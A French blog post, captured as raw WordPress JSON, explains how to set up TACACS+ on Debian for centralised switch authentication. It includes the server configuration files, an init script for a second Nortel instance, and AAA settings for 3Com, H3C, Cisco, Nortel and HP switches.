Cr\u00e9ation du groupe GNETWORK dans l’annuaire Active Directory.<\/p>\n\n\n\n
Les deux serveurs doivent \u00eatre membres du domaine HOME.<\/p>\n\n\n\n
Installer TACACS+ :<\/p>\n\n\n\n
# aptitude update && aptitude install tacacs+\n<\/pre>\n\n\n\nSauvegarder le fichier de configuration de TACACS+ :<\/p>\n\n\n\n
# cp \/etc\/tacacs+\/tac_plus.conf \/etc\/tacacs+\/tac_plus.conf.original\n<\/pre>\n\n\n\nEditer le fichier de configuration de TACACS+ :<\/p>\n\n\n\n
# > \/etc\/tacacs+\/tac_plus.conf\n# vim \/etc\/tacacs+\/tac_plus.conf\n<\/pre>\n\n\n\n# Created by Henry-Nicolas Tourneur(henry.nicolas@tourneur.be)\n# See man(5) tac_plus.conf for more details\n\n# Define where to log accounting data, this is the default.\n\naccounting file = \/var\/log\/tac_plus.acct\n\n# This is the key that clients have to use to access Tacacs+\n\nkey = \"abcdefgh\"\n\n# Groups\n\ngroup = admins {\n default service = permit\n login = PAM\n service = exec {\n priv-lvl = 15\n idletime = 10\n }\n}\n\n# Users\n\nuser = test1 {\n member = admins\n}\n\nuser = test2 {\n member = admins\n}\n\n# Much more features are availables, like ACL, more service compatibilities,\n# commands authorization, scripting authorization.\n# See the man page for those features.\n<\/pre>\n\n\n\nCr\u00e9er un fichier de configuration TACACS+ pour Nortel :<\/p>\n\n\n\n
# cp \/etc\/tacacs+\/tac_plus.conf \/etc\/tacacs+\/tac_plus_nortel.conf\n<\/pre>\n\n\n\nEditer le fichier de configuration de TACACS+ pour Nortel :<\/p>\n\n\n\n
# vim \/etc\/tacacs+\/tac_plus_nortel.conf\n<\/pre>\n\n\n\n# Created by Henry-Nicolas Tourneur(henry.nicolas@tourneur.be)\n# See man(5) tac_plus.conf for more details\n\n# Define where to log accounting data, this is the default.\n\naccounting file = \/var\/log\/tac_plus_nortel.acct\n\n# This is the key that clients have to use to access Tacacs+\n\nkey = \"abcdefgh\"\n\n# Groups\n\ngroup = admins {\n default service = permit\n login = PAM\n service = exec {\n priv-lvl = 6\n idletime = 10\n }\n}\n\n# Users\n\nuser = test1 {\n member = admins\n}\n\nuser = test2 {\n member = admins\n}\n\n# Much more features are availables, like ACL, more service compatibilities,\n# commands authorization, scripting authorization.\n# See the man page for those features.\n<\/pre>\n\n\n\nEditer le fichier de configuration des options par d\u00e9faut de TACACS+ :<\/p>\n\n\n\n
# vim \/etc\/default\/tacacs+\n<\/pre>\n\n\n\n# This is the configuration file for \/etc\/init.d\/tacacs+\n# You can overwrite default arguments passed to the daemon here.\n# See man(8) tac_plus\n\n\nDAEMON_OPTS=\"-C \/etc\/tacacs+\/tac_plus.conf -d16\"\n<\/pre>\n\n\n\nCr\u00e9er un fichier de configuration des options par d\u00e9faut de TACACS+ pour Nortel :<\/p>\n\n\n\n
# cp \/etc\/default\/tacacs+ \/etc\/default\/tacacs+_nortel\n<\/pre>\n\n\n\nEditer le fichier de configuration des options par d\u00e9faut de TACACS+ pour Nortel :<\/p>\n\n\n\n
# vim \/etc\/default\/tacacs+_nortel\n<\/pre>\n\n\n\n# This is the configuration file for \/etc\/init.d\/tacacs+\n# You can overwrite default arguments passed to the daemon here.\n# See man(8) tac_plus\n\n\nDAEMON_OPTS=\"-C \/etc\/tacacs+\/tac_plus_nortel.conf -p 4949 -d16 -l \/var\/log\/tac_plus_nortel.log\"\n<\/pre>\n\n\n\nCr\u00e9er un script d’init pour le serveur TACACS+ pour Nortel et le rendre ex\u00e9cutable :<\/p>\n\n\n\n
# cp \/etc\/init.d\/tacacs_plus \/etc\/init.d\/tacacs_plus_nortel && chmod +x \/etc\/init.d\/tacacs_plus_nortel\n<\/pre>\n\n\n\nModifier le script d’init pour le serveur TACACS+ pour Nortel :<\/p>\n\n\n\n
# vim \/etc\/init.d\/tacacs_plus_nortel\n<\/pre>\n\n\n\n#!\/bin\/sh\n### BEGIN INIT INFO\n# Provides: tacacs+_nortel\n# Required-Start: $network $local_fs $syslog $remote_fs\n# Required-Stop: $network $local_fs $remote_fs\n# Should-Start: $named\n# Default-Start: 2 3 4 5\n# Default-Stop: 0 1 6\n# Short-Description: TACACS+ authentication daemon for Nortel\n### END INIT INFO\n\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\nDAEMON=\/usr\/sbin\/tac_plus\nNAME=\"tacacs+_nortel\"\nDESC=\"TACACS+ authentication daemon for Nortel\"\nLOGDIR=\/var\/log\/\nSTARTTIME=1\n\nPIDFILE=\"\/var\/run\/tac_plus.pid.4949\"\n\ntest -x $DAEMON || exit 0\n\n. \/lib\/lsb\/init-functions\n\n# Default options, these can be overriden by the information\n# at \/etc\/default\/$NAME\nDAEMON_OPTS=\"-C \/etc\/tacacs+\/tac_plus_nortel.conf -p 4949\" # Additional options given to the server\n\n\nLOGFILE=$LOGDIR\/tac_plus_nortel.log # Server logfile\n\n# Include defaults if available\nif [ -f \/etc\/default\/$NAME ] ; then\n . \/etc\/default\/$NAME\nfi\n\n# Check that the user exists (if we set a user)\n# Does the user exist?\nif [ -n \"$DAEMONUSER\" ] ; then\n if getent passwd | grep -q \"^$DAEMONUSER:\"; then\n # Obtain the uid and gid\n DAEMONUID=`getent passwd |grep \"^$DAEMONUSER:\" | awk -F : '{print $3}'`\n DAEMONGID=`getent passwd |grep \"^$DAEMONUSER:\" | awk -F : '{print $4}'`\n else\n log_failure_msg \"The user $DAEMONUSER, required to run $NAME does not exist.\"\n exit 1\n fi\nfi\n\n\nset -e\n\nrunning_pid() {\n# Check if a given process pid's cmdline matches a given name\n pid=$1\n name=$2\n [ -z \"$pid\" ] && return 1\n [ ! -d \/proc\/$pid ] && return 1\n cmd=`cat \/proc\/$pid\/cmdline | tr \"\\000\" \"\\n\"|head -n 1 |cut -d : -f 1`\n # Is this the expected server\n [ \"$cmd\" != \"$name\" ] && return 1\n return 0\n}\n\nrunning() {\n# Check if the process is running looking at \/proc\n# (works for all users)\n\n # No pidfile, probably no daemon present\n [ ! -f \"$PIDFILE\" ] && return 1\n pid=`cat $PIDFILE`\n running_pid $pid $DAEMON || return 1\n return 0\n}\n\nstart_server() {\n# Start the process using the wrapper\n start-stop-daemon --start --quiet --pidfile $PIDFILE \\\n --exec $DAEMON -- $DAEMON_OPTS\n errcode=$?\n return $errcode\n}\n\nstop_server() {\n# Stop the process using the wrapper\n if [ -z \"$DAEMONUSER\" ] ; then\n killproc -p $PIDFILE $DAEMON\n errcode=$?\n else\n# if we are using a daemonuser then look for process that match\n start-stop-daemon --stop --quiet --pidfile $PIDFILE \\\n --user $DAEMONUSER \\\n --exec $DAEMON\n errcode=$?\n fi\n\n return $errcode\n}\n\nreload_server() {\n [ ! -f \"$PIDFILE\" ] && return 1\n pid=`cat $PIDFILE` # This is the daemon's pid\n # Send a SIGHUP\n kill -1 $pid\n return $?\n}\n\nforce_stop() {\n# Force the process to die killing it manually\n [ ! -e \"$PIDFILE\" ] && return\n if running ; then\n kill -15 $pid\n # Is it really dead?\n sleep \"$DIETIME\"s\n if running ; then\n kill -9 $pid\n sleep \"$DIETIME\"s\n if running ; then\n echo \"Cannot kill $NAME (pid=$pid)!\"\n exit 1\n fi\n fi\n fi\n rm -f $PIDFILE\n}\n\n\ncase \"$1\" in\n start)\n log_daemon_msg \"Starting $DESC \" \"$NAME\"\n # Check if it's running first\n if running ; then\n log_progress_msg \"apparently already running\"\n log_end_msg 0\n exit 0\n fi\n if start_server ; then\n # NOTE: Some servers might die some time after they start,\n # this code will detect this issue if STARTTIME is set\n # to a reasonable value\n [ -n \"$STARTTIME\" ] && sleep $STARTTIME # Wait some time\n if running ; then\n # It's ok, the server started and is running\n log_end_msg 0\n else\n # It is not running after we did start\n log_end_msg 1\n fi\n else\n # Either we could not start it\n log_end_msg 1\n fi\n ;;\n stop)\n log_daemon_msg \"Stopping $DESC\" \"$NAME\"\n if running ; then\n # Only stop the server if we see it running\n errcode=0\n stop_server || errcode=$?\n log_end_msg $errcode\n else\n # If it's not running don't do anything\n log_progress_msg \"apparently not running\"\n log_end_msg 0\n exit 0\n fi\n ;;\n force-stop)\n # First try to stop gracefully the program\n $0 stop\n if running; then\n # If it's still running try to kill it more forcefully\n log_daemon_msg \"Stopping (force) $DESC\" \"$NAME\"\n errcode=0\n force_stop || errcode=$?\n log_end_msg $errcode\n fi\n ;;\n restart|force-reload)\n log_daemon_msg \"Restarting $DESC\" \"$NAME\"\n errcode=0\n stop_server || errcode=$?\n # Wait some sensible amount, some server need this\n [ -n \"$DIETIME\" ] && sleep $DIETIME\n start_server || errcode=$?\n [ -n \"$STARTTIME\" ] && sleep $STARTTIME\n running || errcode=$?\n log_end_msg $errcode\n ;;\n status)\n\n log_daemon_msg \"Checking status of $DESC\" \"$NAME\"\n if running ; then\n log_progress_msg \"running\"\n log_end_msg 0\n else\n log_progress_msg \"apparently not running\"\n log_end_msg 1\n exit 1\n fi\n ;;\n # Use this if the daemon cannot reload\n reload)\n log_daemon_msg \"Reloading $DESC configuration files\" \"$NAME\"\n if reload_server ; then\n if running ; then\n log_end_msg 0\n else\n log_progress_msg \"$NAME not running\"\n log_end_msg 1\n fi\n else\n log_progress_msg \"Reload failled\"\n log_end_msg 1\n fi\n ;;\n *)\n N=\/etc\/init.d\/$NAME\n echo \"Usage: $N {start|stop|force-stop|restart|force-reload|status}\" >&2\n exit 1\n ;;\nesac\n\nexit 0\n<\/pre>\n\n\n\nActiver le script d’init pour le serveur TACACS+ pour Nortel :<\/p>\n\n\n\n
# insserv tacacs_plus_nortel\n<\/pre>\n\n\n\nRelancer le serveur TACACS+ :<\/p>\n\n\n\n
# \/etc\/init.d\/tacacs_plus restart\n<\/pre>\n\n\n\nLancer le serveur TACACS+ our Nortel :<\/p>\n\n\n\n
# \/etc\/init.d\/tacacs_plus_nortel start\n<\/pre>\n\n\n\nConfiguration des \u00e9quipements<\/h2>\n\n\n\n
3Com 5500G-EI<\/h3>\n\n\n\n
#\nhwtacacs scheme mytac\n primary authentication 10.20.30.1\n secondary authentication 10.20.30.2\n primary authorization 10.20.30.1\n secondary authorization 10.20.30.2\n primary accounting 10.20.30.1\n secondary accounting 10.20.30.2\n key authentication abcdefgh\n key authorization abcdefgh\n key accounting abcdefgh\n user-name-format without-domain\n#\ndomain mytac\n scheme hwtacacs-scheme mytac local\n access-limit enable 10\n#\n domain default enable mytac\n#\n<\/pre>\n\n\n\nH3C S5500-52C-EI<\/h3>\n\n\n\n
#\nhwtacacs scheme mytac\n primary authentication 10.20.30.1\n secondary authentication 10.20.30.2\n primary authorization 10.20.30.1\n secondary authorization 10.20.30.2\n primary accounting 10.20.30.1\n secondary accounting 10.20.30.2\n key authentication abcdefgh\n key authorization abcdefgh\n user-name-format without-domain\n#\ndomain mytac\n authentication login hwtacacs-scheme mytac local\n authorization login hwtacacs-scheme mytac local\n access-limit enable 10\n state active\n idle-cut disable\n self-service-url disable\n#\n domain default enable mytac\n#\n<\/pre>\n\n\n\n3Com 4210G 48-Port<\/h3>\n\n\n\n
#\nhwtacacs scheme mytac\n primary authentication 10.20.30.1\n secondary authentication 10.20.30.2\n primary authorization 10.20.30.1\n secondary authorization 10.20.30.2\n primary accounting 10.20.30.1\n secondary accounting 10.20.30.2\n key authentication abcdefgh\n key authorization abcdefgh\n user-name-format without-domain\n#\ndomain mytac\n authentication login hwtacacs-scheme mytac local\n authorization login hwtacacs-scheme mytac local\n access-limit enable 10\n state active\n idle-cut disable\n self-service-url disable\n#\n domain default enable mytac\n#\n<\/pre>\n\n\n\nCisco WS-CBS3020-HPQ<\/h3>\n\n\n\n
!\naaa authentication login default group tacacs+ local\naaa authorization exec default group tacacs+ local\n!\ntacacs-server host 10.20.30.1 timeout 5\ntacacs-server host 10.20.30.2 timeout 5\ntacacs-server directed-request\ntacacs-server key abcdefgh\n!\n<\/pre>\n\n\n\nNortel Application Switch 2208 E<\/h3>\n\n\n\n
Remarque : une instance sp\u00e9cifique du serveur TACACS+ \u00e9coute sur le port TCP\/4949 pour les \u00e9quipements Nortel (les privil\u00e8ges diff\u00e8rent des autres \u00e9quipements) Remarque : l’utilisateur notacacs doit \u00eatre utilis\u00e9, avec le mot de passe du compte admin local, dans le cas d’un dysfonctionnement du serveur TACACS+<\/p>\n\n\n\n
\/cfg\/sys\/tacacs\nport 4949\nprisrv 10.20.30.1\nsecsrv 10.20.30.2\nsecret\nsecret2\nsecbd e\non\napply\n<\/pre>\n\n\n\nHP ProLiant BL p-Class C-GbE2 Interconnect Switch<\/h3>\n\n\n\n
Remarque : une instance sp\u00e9cifique du serveur TACACS+ \u00e9coute sur le port TCP\/4949 pour les \u00e9quipements Nortel (les privil\u00e8ges diff\u00e8rent des autres \u00e9quipements) Remarque : l’utilisateur notacacs doit \u00eatre utilis\u00e9, avec le mot de passe du compte admin local, dans le cas d’un dysfonctionnement du serveur TACACS+<\/p>\n\n\n\n
\/cfg\/sys\/tacacs+\nport 4949\nprisrv 10.20.30.1\nsecsrv 10.20.30.2\nsecret\nsecret2\ntelnet e\non\napply<\/pre>\n","protected":false},"excerpt":{"rendered":"Pr\u00e9-requis Cr\u00e9ation du groupe GNETWORK dans l’annuaire Active Directory. Les deux serveurs doivent \u00eatre membres du domaine HOME. Installation et configuration Installer TACACS+ : # aptitude update && aptitude install tacacs+ …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[8,9,38],"class_list":["post-48","post","type-post","status-publish","format-standard","hentry","category-computing","tag-debian","tag-linux","tag-tacacs"],"_links":{"self":[{"href":"https:\/\/www.n3oxid.fr\/index.php?rest_route=\/wp\/v2\/posts\/48","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.n3oxid.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.n3oxid.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.n3oxid.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.n3oxid.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=48"}],"version-history":[{"count":1,"href":"https:\/\/www.n3oxid.fr\/index.php?rest_route=\/wp\/v2\/posts\/48\/revisions"}],"predecessor-version":[{"id":49,"href":"https:\/\/www.n3oxid.fr\/index.php?rest_route=\/wp\/v2\/posts\/48\/revisions\/49"}],"wp:attachment":[{"href":"https:\/\/www.n3oxid.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=48"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.n3oxid.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=48"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.n3oxid.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=48"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}